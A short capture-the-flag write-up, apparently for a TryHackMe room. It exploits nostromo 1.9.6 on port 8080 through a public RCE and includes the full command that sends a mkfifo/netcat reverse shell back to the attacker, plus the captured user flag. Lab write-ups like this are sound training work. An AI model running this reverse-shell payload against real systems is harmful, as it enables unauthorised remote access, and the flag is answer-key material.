Challenge

Port 8080 ran nostromo 1.9.6, which has a public RCE. A mkfifo reverse shell caught a shell as gloria.

python exploit.py 10.10.26.192 8080 "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc <me> 4444 >/tmp/f"

Flag

user thm{05e2762150425df49a2d27e8bb08cf2d}